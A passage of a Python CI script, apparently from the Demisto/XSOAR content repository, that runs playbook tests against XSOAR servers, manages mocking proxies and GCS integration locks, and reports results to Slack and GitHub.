integrations, unmockable_integrations, playbook_id, succeed_playbooks, test_message, test_options,
slack, circle_ci, build_number, server_url, build_name, prints_manager, is_ami=True, thread_index=0):
start_message = f'------ Test {test_message} start ------'
client = demisto_client.configure(base_url=server_url, username=demisto_user, password=demisto_pass, verify_ssl=False)
if not is_ami or (not integrations or has_unmockable_integration(integrations, unmockable_integrations)):
prints_manager.add_print_job(start_message + ' (Mock: Disabled)', print, thread_index, include_timestamp=True)
run_test_logic(conf_json_test_details, tests_queue, tests_settings, client, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=thread_index)
prints_manager.add_print_job('------ Test %s end ------\n' % (test_message,), print, thread_index,
include_timestamp=True)
return
mock_run(conf_json_test_details, tests_queue, tests_settings, client, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, start_message, prints_manager, thread_index=thread_index)
def http_request(url, params_dict=None):
try:
res = requests.request("GET",
url,
verify=True,
params=params_dict,
)
res.raise_for_status()
return res.json()
except Exception as e:
raise e
def get_user_name_from_circle(circleci_token, build_number):
url = "https://circleci.com/api/v1.1/project/github/demisto/content/{0}?circle-token={1}".format(build_number,
circleci_token)
res = http_request(url)
user_details = res.get('user', {})
return user_details.get('name', '')
def notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name):
circle_user_name = get_user_name_from_circle(circle_ci, build_number)
sc = SlackClient(slack)
user_id = retrieve_id(circle_user_name, sc)
text = "{0} - {1} Failed\n{2}".format(build_name, playbook_id, server_url) if inc_id == -1 \
else "{0} - {1} Failed\n{2}/#/WorkPlan/{3}".format(build_name, playbook_id, server_url, inc_id)
if user_id:
sc.api_call(
"chat.postMessage",
channel=user_id,
username="Content CircleCI",
as_user="False",
text=text
)
def retrieve_id(circle_user_name, sc):
user_id = ''
res = sc.api_call('users.list')
user_list = res.get('members', [])
for user in user_list:
profile = user.get('profile', {})
name = profile.get('real_name_normalized', '')
if name == circle_user_name:
user_id = user.get('id', '')
return user_id
def create_result_files(tests_data_keeper):
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_integration = tests_data_keeper.skipped_integrations
skipped_tests = tests_data_keeper.skipped_tests
with open("./Tests/failed_tests.txt", "w") as failed_tests_file:
failed_tests_file.write('\n'.join(failed_playbooks))
with open('./Tests/skipped_tests.txt', "w") as skipped_tests_file:
skipped_tests_file.write('\n'.join(skipped_tests))
with open('./Tests/skipped_integrations.txt', "w") as skipped_integrations_file:
skipped_integrations_file.write('\n'.join(skipped_integration))
def change_placeholders_to_values(placeholders_map, config_item):
"""Replaces placeholders in the object to their real values
Args:
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
config_item: (json object)
Integration configuration object.
Returns:
dict. json object with the real configuration.
"""
item_as_string = json.dumps(config_item)
for key, value in placeholders_map.items():
item_as_string = item_as_string.replace(key, value)
return json.loads(item_as_string)
def set_integration_params(demisto_api_key, integrations, secret_params, instance_names, playbook_id,
prints_manager, placeholders_map, thread_index=0):
for integration in integrations:
integration_params = [change_placeholders_to_values(placeholders_map, item) for item
in secret_params if item['name'] == integration['name']]
if integration_params:
matched_integration_params = integration_params[0]
if len(integration_params) != 1:
found_matching_instance = False
for item in integration_params:
if item.get('instance_name', 'Not Found') in instance_names:
matched_integration_params = item
found_matching_instance = True
if not found_matching_instance:
optional_instance_names = [optional_integration.get('instance_name', 'None')
for optional_integration in integration_params]
error_msg = FAILED_MATCH_INSTANCE_MSG.format(playbook_id, len(integration_params),
integration['name'],
'\n'.join(optional_instance_names))
prints_manager.add_print_job(error_msg, print_error, thread_index)
return False
integration['params'] = matched_integration_params.get('params', {})
integration['byoi'] = matched_integration_params.get('byoi', True)
integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
integration['validate_test'] = matched_integration_params.get('validate_test', True)
elif integration['name'] == 'Demisto REST API':
integration['params'] = {
'url': 'https://localhost',
'apikey': demisto_api_key,
'insecure': True,
}
return True
def collect_integrations(integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations):
integrations = []
is_nightly_integration = False
test_skipped_integration = []
for integration in integrations_conf:
if integration in skipped_integrations_conf.keys():
skipped_integration.add("{0} - reason: {1}".format(integration, skipped_integrations_conf[integration]))
test_skipped_integration.append(integration)
if integration in nightly_integrations:
is_nightly_integration = True
# string description
integrations.append({
'name': integration,
'params': {}
})
return test_skipped_integration, integrations, is_nightly_integration
def extract_filtered_tests(is_nightly):
if is_nightly:
# TODO: verify this response
return [], False, True
with open(FILTER_CONF, 'r') as filter_file:
filtered_tests = filter_file.readlines()
filtered_tests = [line.strip('\n') for line in filtered_tests]
is_filter_configured = bool(filtered_tests)
run_all = RUN_ALL_TESTS_FORMAT in filtered_tests
return filtered_tests, is_filter_configured, run_all
def load_conf_files(conf_path, secret_conf_path):
with open(conf_path) as data_file:
conf = json.load(data_file)
secret_conf = None
if secret_conf_path:
with open(secret_conf_path) as data_file:
secret_conf = json.load(data_file)
return conf, secret_conf
def run_test_scenario(tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf,
nightly_integrations, skipped_integrations_conf, skipped_integration, is_nightly,
run_all_tests, is_filter_configured, filtered_tests, skipped_tests, secret_params,
failed_playbooks, playbook_skipped_integration, unmockable_integrations,
succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_user, demisto_pass, demisto_api_key,
prints_manager, thread_index=0, is_ami=True):
playbook_id = t['playbookID']
nightly_test = t.get('nightly', False)
integrations_conf = t.get('integrations', [])
instance_names_conf = t.get('instance_names', [])
test_message = 'playbook: ' + playbook_id
test_options = {
'timeout': t.get('timeout', default_test_timeout),
'memory_threshold': t.get('memory_threshold', Docker.DEFAULT_CONTAINER_MEMORY_USAGE),
'pid_threshold': t.get('pid_threshold', Docker.DEFAULT_CONTAINER_PIDS_USAGE)
}
if not isinstance(integrations_conf, list):
integrations_conf = [integrations_conf, ]
if not isinstance(instance_names_conf, list):
instance_names_conf = [instance_names_conf, ]
test_skipped_integration, integrations, is_nightly_integration = collect_integrations(
integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations)
if playbook_id in filtered_tests:
playbook_skipped_integration.update(test_skipped_integration)
skip_nightly_test = (nightly_test or is_nightly_integration) and not is_nightly
# Skip nightly test
if skip_nightly_test:
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
prints_manager.add_print_job('Skip test', print, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
if not run_all_tests:
# Skip filtered test
if is_filter_configured and playbook_id not in filtered_tests:
return
# Skip bad test
if playbook_id in skipped_tests_conf:
skipped_tests.add(f'{playbook_id} - reason: {skipped_tests_conf[playbook_id]}')
return
# Skip integration
if test_skipped_integration:
return
# Skip version mismatch test
test_from_version = t.get('fromversion', '0.0.0')
test_to_version = t.get('toversion', '99.99.99')
if not (LooseVersion(test_from_version) <= LooseVersion(server_numeric_version) <= LooseVersion(test_to_version)):
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
warning_message = 'Test {} ignored due to version mismatch (test versions: {}-{})'.format(test_message,
test_from_version,
test_to_version)
prints_manager.add_print_job(warning_message, print_warning, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
placeholders_map = {'%%SERVER_HOST%%': server}
are_params_set = set_integration_params(demisto_api_key, integrations, secret_params, instance_names_conf,
playbook_id, prints_manager, placeholders_map, thread_index=thread_index)
if not are_params_set:
failed_playbooks.append(playbook_id)
return
test_message = update_test_msg(integrations, test_message)
options = options_handler()
stdout, stderr = get_docker_memory_data()
text = 'Memory Usage: {}'.format(stdout) if not stderr else stderr
if options.nightly and options.memCheck and not tests_settings.is_local_run:
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
stdout, stderr = get_docker_processes_data()
text = stdout if not stderr else stderr
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
run_test(t, tests_queue, tests_settings, demisto_user, demisto_pass, proxy, failed_playbooks,
integrations, unmockable_integrations, playbook_id, succeed_playbooks, test_message,
test_options, slack, circle_ci, build_number, server, build_name, prints_manager,
is_ami, thread_index=thread_index)
def load_env_results_json():
if not os.path.isfile(ENV_RESULTS_PATH):
return {}
with open(ENV_RESULTS_PATH, 'r') as json_file:
return json.load(json_file)
def get_server_numeric_version(ami_env, is_local_run=False):
"""
Gets the current server version
Arguments:
ami_env: (str)
AMI version name.
is_local_run: (bool)
when running locally, assume latest version.
Returns:
(str) Server numeric version
"""
default_version = '99.99.98'
if is_local_run:
print_color(f'Local run, assuming server version is {default_version}', LOG_COLORS.GREEN)
return default_version
env_json = load_env_results_json()
if not env_json:
print_warning(f'Did not find {ENV_RESULTS_PATH} file, assuming server version is {default_version}.')
return default_version
instances_ami_names = {env.get('AmiName') for env in env_json if ami_env in env.get('Role', '')}
if len(instances_ami_names) != 1:
print_warning(f'Did not get one AMI Name, got {instances_ami_names}.'
f' Assuming server version is {default_version}')
return default_version
instances_ami_name = list(instances_ami_names)[0]
extracted_version = re.findall(r'Demisto-(?:Circle-CI|MarketPlace)-Content-[\w-]+-([\d.]+)-[\d]{5}',
instances_ami_name)
if extracted_version:
server_numeric_version = extracted_version[0]
else:
server_numeric_version = default_version
# make sure version is three-part version
if server_numeric_version.count('.') == 1:
server_numeric_version += ".0"
print_color(f'Server version: {server_numeric_version}', LOG_COLORS.GREEN)
return server_numeric_version
def get_instances_ips_and_names(tests_settings):
if tests_settings.server:
return [tests_settings.server]
env_json = load_env_results_json()
instances_ips = [(env.get('Role'), env.get('InstanceDNS')) for env in env_json]
return instances_ips
def get_test_records_of_given_test_names(tests_settings, tests_names_to_search):
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
test_records_with_supplied_names = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name and test_name in tests_names_to_search:
test_records_with_supplied_names.append(test_record)
return test_records_with_supplied_names
def get_json_file(path):
with open(path, 'r') as json_file:
return json.loads(json_file.read())
def execute_testing(tests_settings, server_ip, mockable_tests_names, unmockable_tests_names,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True):
server = SERVER_URL.format(server_ip)
server_numeric_version = tests_settings.serverNumericVersion
start_message = "Executing tests with the server {} - and the server ip {}".format(server, server_ip)
prints_manager.add_print_job(start_message, print, thread_index)
is_nightly = tests_settings.nightly
is_memory_check = tests_settings.memCheck
slack = tests_settings.slack
circle_ci = tests_settings.circleci
build_number = tests_settings.buildNumber
build_name = tests_settings.buildName
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
demisto_api_key = tests_settings.api_key
demisto_user = secret_conf['username']
demisto_pass = secret_conf['userPassword']
default_test_timeout = conf.get('testTimeout', 30)
tests = conf['tests']
skipped_tests_conf = conf['skipped_tests']
nightly_integrations = conf['nightly_integrations']
skipped_integrations_conf = conf['skipped_integrations']
unmockable_integrations = conf['unmockable_integrations']
secret_params = secret_conf['integrations'] if secret_conf else []
filtered_tests, is_filter_configured, run_all_tests = extract_filtered_tests(tests_settings.nightly)
if is_filter_configured and not run_all_tests:
is_nightly = True
if not tests or len(tests) == 0:
prints_manager.add_print_job('no integrations are configured for test', print, thread_index)
prints_manager.execute_thread_prints(thread_index)
return
xsoar_client = demisto_client.configure(base_url=server, username=demisto_user,
password=demisto_pass, verify_ssl=False)
# turn off telemetry
turn_off_telemetry(xsoar_client)
proxy = None
if is_ami:
ami = AMIConnection(server_ip)
ami.clone_mock_data()
proxy = MITMProxy(server_ip)
failed_playbooks = []
succeed_playbooks = []
skipped_tests = set([])
skipped_integration = set([])
playbook_skipped_integration = set([])
disable_all_integrations(xsoar_client, prints_manager, thread_index=thread_index)
prints_manager.execute_thread_prints(thread_index)
mockable_tests = get_test_records_of_given_test_names(tests_settings, mockable_tests_names)
unmockable_tests = get_test_records_of_given_test_names(tests_settings, unmockable_tests_names)
if is_nightly and is_memory_check:
mem_lim, err = get_docker_limit()
send_slack_message(slack, SLACK_MEM_CHANNEL_ID,
f'Build Number: {build_number}\n Server Address: {server}\nMemory Limit: {mem_lim}',
'Content CircleCI', 'False')
try:
# first run the mock tests to avoid mockless side effects in container
if is_ami and mockable_tests:
proxy.configure_proxy_in_demisto(proxy=proxy.ami.docker_ip + ':' + proxy.PROXY_PORT,
username=demisto_user, password=demisto_pass,
server=server)
executed_in_current_round, mockable_tests_queue = initialize_queue_and_executed_tests_set(mockable_tests)
while not mockable_tests_queue.empty():
t = mockable_tests_queue.get()
executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
prints_manager,
t,
thread_index,
mockable_tests_queue)
run_test_scenario(mockable_tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf,
nightly_integrations, skipped_integrations_conf, skipped_integration, is_nightly,
run_all_tests, is_filter_configured, filtered_tests,
skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server,
build_name, server_numeric_version, demisto_user, demisto_pass,
demisto_api_key, prints_manager, thread_index=thread_index)
proxy.configure_proxy_in_demisto(username=demisto_user, password=demisto_pass, server=server)
# reset containers after clearing the proxy server configuration
reset_containers(server, demisto_user, demisto_pass, prints_manager, thread_index)
prints_manager.add_print_job("\nRunning mock-disabled tests", print, thread_index)
executed_in_current_round, unmockable_tests_queue = initialize_queue_and_executed_tests_set(unmockable_tests)
while not unmockable_tests_queue.empty():
t = unmockable_tests_queue.get()
executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
prints_manager,
t,
thread_index,
unmockable_tests_queue)
run_test_scenario(unmockable_tests_queue, tests_settings, t, proxy, default_test_timeout,
skipped_tests_conf, nightly_integrations, skipped_integrations_conf, skipped_integration,
is_nightly, run_all_tests, is_filter_configured, filtered_tests, skipped_tests,
secret_params, failed_playbooks, playbook_skipped_integration, unmockable_integrations,
succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_user, demisto_pass, demisto_api_key,
prints_manager, thread_index, is_ami)
prints_manager.execute_thread_prints(thread_index)
except Exception as exc:
if exc.__class__ == ApiException:
error_message = exc.body
else:
error_message = f'~~ Thread {thread_index + 1} failed ~~\n{str(exc)}\n{traceback.format_exc()}'
prints_manager.add_print_job(error_message, print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
failed_playbooks.append(f'~~ Thread {thread_index + 1} failed ~~')
raise
finally:
tests_data_keeper.add_tests_data(succeed_playbooks, failed_playbooks, skipped_tests,
skipped_integration, unmockable_integrations)
if is_ami:
tests_data_keeper.add_proxy_related_test_data(proxy)
if build_name == 'master':
updating_mocks_msg = "Pushing new/updated mock files to mock git repo."
prints_manager.add_print_job(updating_mocks_msg, print, thread_index)
ami.upload_mock_files(build_name, build_number)
if playbook_skipped_integration and build_name == 'master':
comment = 'The following integrations are skipped and critical for the test:\n {}'. \
format('\n- '.join(playbook_skipped_integration))
add_pr_comment(comment)
# Sending proxy metrics to GCP
try:
storage_client = storage.Client()
now = datetime.datetime.now().replace(microsecond=0).isoformat()
# each log line will be comprised of the following metrics:
# - Date
# - Count of successful tests
# - Count of failed tests
# - Count of successful rerecords
# - Count of failed rerecords
# - IDs of the playbooks that were rerecorded successfully
# - Ids of the playbooks that have failed rerecording
new_proxy_line = f'{now},' \
f'{proxy.successful_tests_count},' \
f'{proxy.failed_tests_count},' \
f'{proxy.successful_rerecord_count},' \
f'{proxy.failed_rerecord_count},' \
f'{";".join(proxy.rerecorded_tests)},' \
f'{";".join(proxy.failed_rerecord_tests)}\n'
bucket = storage_client.bucket(BUCKET_NAME)
# Google storage objects are immutable and there is no way to append to them.
# The workaround is to create a new temp file and then compose the log file with the new created file
# see here for more info https://cloud.google.com/storage/docs/json_api/v1/objects/compose
new_file_blob = bucket.blob(f'{LOCKS_PATH}/{WORKFLOW_ID}.txt')
new_file_blob.upload_from_string(new_proxy_line)
current_file_blob = bucket.blob(f'{LOCKS_PATH}/{PROXY_LOG_FILE_NAME}')
current_file_blob.compose([current_file_blob, new_file_blob])
new_file_blob.delete()
except Exception:
prints_manager.add_print_job("Failed to save proxy metrics", print, thread_index)
def update_round_set_and_sleep_if_round_completed(executed_in_current_round: set,
prints_manager: ParallelPrintsManager,
t: dict,
thread_index: int,
unmockable_tests_queue: Queue) -> set:
"""
Checks if the string representation of the current test configuration is already in
the executed_in_current_round set.
If it is- it means we have already executed this test and the we have reached a round and there are tests that
were not able to be locked by this execution..
In that case we want to start a new round monitoring by emptying the 'executed_in_current_round' set and sleep
in order to let the tests be unlocked
Args:
executed_in_current_round: A set containing the string representation of all tests configuration as they appear
in conf.json file that were already executed in the current round
prints_manager: ParallelPrintsManager object
t: test configuration as it appears in conf.json file
thread_index: Currently executing thread
unmockable_tests_queue: The queue of remaining tests
Returns:
A new executed_in_current_round set which contains only the current tests configuration if a round was completed
else it just adds the new test to the set.
"""
if str(t) in executed_in_current_round:
prints_manager.add_print_job(
'all tests in the queue were executed, sleeping for 30 seconds to let locked tests get unlocked.',
print,
thread_index)
executed_in_current_round = set()
time.sleep(30)
executed_in_current_round.add(str(t))
return executed_in_current_round
def initialize_queue_and_executed_tests_set(tests):
tests_queue = Queue()
already_executed_test_playbooks = set()
for t in tests:
tests_queue.put(t)
return already_executed_test_playbooks, tests_queue
def get_unmockable_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
unmockable_integrations = conf['unmockable_integrations']
tests = conf['tests']
unmockable_tests = []
for test_record in tests:
test_name = test_record.get("playbookID")
integrations_used_in_test = get_used_integrations(test_record)
unmockable_integrations_used = [integration_name for integration_name in integrations_used_in_test if
integration_name in unmockable_integrations]
if test_name and (not integrations_used_in_test or unmockable_integrations_used):
unmockable_tests.append(test_name)
return unmockable_tests
def get_all_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
all_tests = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name:
all_tests.append(test_name)
return all_tests
def manage_tests(tests_settings):
"""
This function manages the execution of Demisto's tests.
Args:
tests_settings (TestsSettings): An object containing all the relevant data regarding how the tests should be ran
"""
tests_settings.serverNumericVersion = get_server_numeric_version(tests_settings.serverVersion,
tests_settings.is_local_run)
instances_ips = get_instances_ips_and_names(tests_settings)
is_nightly = tests_settings.nightly
number_of_instances = len(instances_ips)
prints_manager = ParallelPrintsManager(number_of_instances)
tests_data_keeper = TestsDataKeeper()
if tests_settings.server:
# If the user supplied a server - all tests will be done on that server.
server_ip = tests_settings.server
print_color("Starting tests for {}".format(server_ip), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(server_ip))
all_tests = get_all_tests(tests_settings)
mockable_tests = []
print(tests_settings.specific_tests_to_run)
unmockable_tests = tests_settings.specific_tests_to_run if tests_settings.specific_tests_to_run else all_tests
execute_testing(tests_settings, server_ip, mockable_tests, unmockable_tests, tests_data_keeper, prints_manager,
thread_index=0, is_ami=False)
elif tests_settings.isAMI:
# Running tests in AMI configuration.
# This is the way we run most tests, including running Circle for PRs and nightly.
if is_nightly:
# If the build is a nightly build, run tests in parallel.
test_allocation = get_tests_allocation_for_threads(number_of_instances, tests_settings.conf_path)
current_thread_index = 0
all_unmockable_tests_list = get_unmockable_tests(tests_settings)
threads_array = []
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion: # Only run tests for given AMI Role
current_instance = ami_instance_ip
tests_allocation_for_instance = test_allocation[current_thread_index]
unmockable_tests = [test for test in all_unmockable_tests_list
if test in tests_allocation_for_instance]
mockable_tests = [test for test in tests_allocation_for_instance if test not in unmockable_tests]
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
if number_of_instances == 1:
execute_testing(tests_settings, current_instance, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
else:
thread_kwargs = {
"tests_settings": tests_settings,
"server_ip": current_instance,
"mockable_tests_names": mockable_tests,
"unmockable_tests_names": unmockable_tests,
"thread_index": current_thread_index,
"prints_manager": prints_manager,
"tests_data_keeper": tests_data_keeper,
}
t = threading.Thread(target=execute_testing, kwargs=thread_kwargs)
threads_array.append(t)
t.start()
current_thread_index += 1
for t in threads_array:
t.join()
else:
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion:
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
all_tests = get_all_tests(tests_settings)
unmockable_tests = get_unmockable_tests(tests_settings)
mockable_tests = [test for test in all_tests if test not in unmockable_tests]
execute_testing(tests_settings, ami_instance_ip, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
sleep(8)
else:
# TODO: understand better when this occurs and what will be the settings
# This case is rare, and usually occurs on two cases:
# 1. When someone from Server wants to trigger a content build on their branch.
# 2. When someone from content wants to run tests on a specific build.
server_numeric_version = '99.99.98' # assume latest
print("Using server version: {} (assuming latest for non-ami)".format(server_numeric_version))
instance_ip = instances_ips[0][1]
all_tests = get_all_tests(tests_settings)
execute_testing(tests_settings, instance_ip, [], all_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=False)
print_test_summary(tests_data_keeper, tests_settings.isAMI)
create_result_files(tests_data_keeper)
if tests_data_keeper.failed_playbooks:
tests_failed_msg = "Some tests have failed. Not destroying instances."
print(tests_failed_msg)
sys.exit(1)
def add_pr_comment(comment):
token = os.environ['CONTENT_GITHUB_TOKEN']
branch_name = os.environ['CIRCLE_BRANCH']
sha1 = os.environ['CIRCLE_SHA1']
query = '?q={}+repo:demisto/content+org:demisto+is:pr+is:open+head:{}+is:open'.format(sha1, branch_name)
url = 'https://api.github.com/search/issues'
headers = {'Authorization': 'Bearer ' + token}
try:
res = requests.get(url + query, headers=headers, verify=False)
res = handle_github_response(res)
if res and res.get('total_count', 0) == 1:
issue_url = res['items'][0].get('comments_url') if res.get('items', []) else None
if issue_url:
res = requests.post(issue_url, json={'body': comment}, headers=headers, verify=False)
handle_github_response(res)
else:
print_warning('Add pull request comment failed: There is more then one open pull request for branch {}.'
.format(branch_name))
except Exception as e:
print_warning('Add pull request comment failed: {}'.format(e))
def handle_github_response(response):
res_dict = response.json()
if not res_dict.ok:
print_warning('Add pull request comment failed: {}'.
format(res_dict.get('message')))
return res_dict
@contextmanager
def acquire_test_lock(integrations_details: list,
test_timeout: int,
prints_manager: ParallelPrintsManager,
thread_index: int,
conf_json_path: str) -> None:
"""
This is a context manager that handles all the locking and unlocking of integrations.
Execution is as following:
* Attempts to lock the test's integrations and yields the result of this attempt
* If lock attempt has failed - yields False, if it succeeds - yields True
* Once the test is done- will unlock all integrations
Args:
integrations_details: test integrations details
test_timeout: test timeout in seconds
prints_manager: ParallelPrintsManager object
thread_index: The index of the thread that executes the unlocking
conf_json_path: Path to conf.json file
Yields:
A boolean indicating the lock attempt result
"""
locked = safe_lock_integrations(test_timeout,
prints_manager,
integrations_details,
thread_index,
conf_json_path)
try:
yield locked
finally:
if not locked:
return
safe_unlock_integrations(prints_manager, integrations_details, thread_index)
prints_manager.execute_thread_prints(thread_index)
def safe_unlock_integrations(prints_manager: ParallelPrintsManager, integrations_details: list, thread_index: int):
"""
This integration safely unlocks the test's integrations.
If an unexpected error occurs - this method will log it's details and other tests execution will continue
Args:
prints_manager: ParallelPrintsManager object
integrations_details: Details of the currently executed test
thread_index: The index of the thread that executes the unlocking
"""
try:
# executing the test could take a while, re-instancing the storage client
storage_client = storage.Client()
unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
except Exception as e:
prints_manager.add_print_job(f'attempt to unlock integration failed for unknown reason.\nError: {e}',
print_warning,
thread_index,
include_timestamp=True)
def safe_lock_integrations(test_timeout: int,
prints_manager: ParallelPrintsManager,
integrations_details: list,
thread_index: int,
conf_json_path: str) -> bool:
"""
This integration safely locks the test's integrations and return it's result
If an unexpected error occurs - this method will log it's details and return False
Args:
test_timeout: Test timeout in seconds
prints_manager: ParallelPrintsManager object
integrations_details: test integrations details
thread_index: The index of the thread that executes the unlocking
conf_json_path: Path to conf.json file
Returns:
A boolean indicating the lock attempt result
"""
conf, _ = load_conf_files(conf_json_path, None)
parallel_integrations_names = conf['parallel_integrations']
filtered_integrations_details = [integration for integration in integrations_details if
integration['name'] not in parallel_integrations_names]
integration_names = get_integrations_list(filtered_integrations_details)
if integration_names:
print_msg = f'Attempting to lock integrations {integration_names}, with timeout {test_timeout}'
else:
print_msg = 'No integrations to lock'
prints_manager.add_print_job(print_msg, print, thread_index, include_timestamp=True)
try:
storage_client = storage.Client()
locked = lock_integrations(filtered_integrations_details, test_timeout, storage_client, prints_manager, thread_index)
except Exception as e:
prints_manager.add_print_job(f'attempt to lock integration failed for unknown reason.\nError: {e}',
print_warning,
thread_index,
include_timestamp=True)
locked = False
return locked
def workflow_still_running(workflow_id: str) -> bool:
"""
This method takes a workflow id and checks if the workflow is still running
If given workflow ID is the same as the current workflow, will simply return True
else it will query circleci api for the workflow and return the status
Args:
workflow_id: The ID of the workflow
Returns:
True if the workflow is running, else False
"""
# If this is the current workflow_id
if workflow_id == WORKFLOW_ID:
return True
else:
try:
workflow_details_response = requests.get(f'https://circleci.com/api/v2/workflow/{workflow_id}',
headers={'Accept': 'application/json'},
auth=(CIRCLE_STATUS_TOKEN, ''))
workflow_details_response.raise_for_status()
except Exception as e:
print(f'Failed to get circleci response about workflow with id {workflow_id}, error is: {e}')
return True
return workflow_details_response.json().get('status') not in ('canceled', 'success', 'failed')
def lock_integrations(integrations_details: list,
test_timeout: int,
storage_client: storage.Client,
prints_manager: ParallelPrintsManager,
thread_index: int) -> bool:
"""
Locks all the test's integrations
Args:
integrations_details: List of current test's integrations
test_timeout: Test timeout in seconds
storage_client: The GCP storage client
prints_manager: ParallelPrintsManager object
thread_index: The index of the thread that executes the unlocking
Returns:
True if all the test's integrations were successfully locked, else False
"""
integrations = get_integrations_list(integrations_details)
if not integrations:
return True
existing_integrations_lock_files = get_locked_integrations(integrations, storage_client)
for integration, lock_file in existing_integrations_lock_files.items():
# Each file has content in the form of <circleci-build-number>:<timeout in seconds>
# If it has not expired - it means the integration is currently locked by another test.
workflow_id, build_number, lock_timeout = lock_file.download_as_string().decode().split(':')
if not lock_expired(lock_file, lock_timeout) and workflow_still_running(workflow_id):
# there is a locked integration for which the lock is not expired - test cannot be executed at the moment
prints_manager.add_print_job(
f'Could not lock integration {integration}, another lock file was exist with '
f'build number: {build_number}, timeout: {lock_timeout}, last update at {lock_file.updated}.\n'
f'Delaying test execution',
print,
thread_index,
include_timestamp=True)
return False
integrations_generation_number = {}
# Gathering generation number with which the new file will be created,
# See https://cloud.google.com/storage/docs/generations-preconditions for details.
for integration in integrations:
if integration in existing_integrations_lock_files:
integrations_generation_number[integration] = existing_integrations_lock_files[integration].generation
else:
integrations_generation_number[integration] = 0
return create_lock_files(integrations_generation_number, prints_manager,
storage_client, integrations_details, test_timeout, thread_index)
def get_integrations_list(test_integrations: list) -> list:
"""
Since test details can have one integration as a string and sometimes a list of integrations- this methods
parses the test's integrations into a list of integration names.
Args:
test_integrations: List of current test's integrations
Returns:
the integration names in a list for all the integrations that takes place in the test
specified in test details.
"""
return [integration['name'] for integration in test_integrations]
def create_lock_files(integrations_generation_number: dict,
prints_manager: ParallelPrintsManager,
storage_client: storage.Client,
integrations_details: list,
test_timeout: int,
thread_index: int) -> bool:
"""
This method tries to create a lock files for all integrations specified in 'integrations_generation_number'.
Each file should contain <circle-ci-build-number>:<test-timeout>
where the <circle-ci-build-number> part is for debugging and troubleshooting
and the <test-timeout> part is to be able to unlock revoked test files.
If for any of the integrations, the lock file creation will fail- the already created files will be cleaned.
Args:
integrations_generation_number: A dict in the form of {<integration-name>:<integration-generation>}
prints_manager: ParallelPrintsManager object
storage_client: The GCP storage client
integrations_details: List of current test's integrations
test_timeout: The time out
thread_index:
Returns:
"""
locked_integrations = []
bucket = storage_client.bucket(BUCKET_NAME)
for integration, generation_number in integrations_generation_number.items():
blob = bucket.blob(f'{LOCKS_PATH}/{integration}')
try:
blob.upload_from_string(f'{WORKFLOW_ID}:{CIRCLE_BUILD_NUM}:{test_timeout + 30}',
if_generation_match=generation_number)
prints_manager.add_print_job(f'integration {integration} locked',
print,
thread_index,
include_timestamp=True)
locked_integrations.append(integration)
except PreconditionFailed:
# if this exception occurs it means that another build has locked this integration
# before this build managed to do it.
# we need to unlock all the integrations we have already locked and try again later
prints_manager.add_print_job(
f'Could not lock integration {integration}, Create file with precondition failed.'
f'delaying test execution.',
print_warning,
thread_index,
include_timestamp=True)
unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
return False
return True
def unlock_integrations(integrations_details: list,
prints_manager: ParallelPrintsManager,
storage_client: storage.Client,
thread_index: int) -> None:
"""
Delete all integration lock files for integrations specified in 'locked_integrations'
Args:
integrations_details: List of current test's integrations
prints_manager: ParallelPrintsManager object
storage_client: The GCP storage client
thread_index: The index of the thread that executes the unlocking
"""
locked_integrations = get_integrations_list(integrations_details)
locked_integration_blobs = get_locked_integrations(locked_integrations, storage_client)
for integration, lock_file in locked_integration_blobs.items():
try:
# Verifying build number is the same as current build number to avoid deleting other tests lock files
_, build_number, _ = lock_file.download_as_string().decode().split(':')
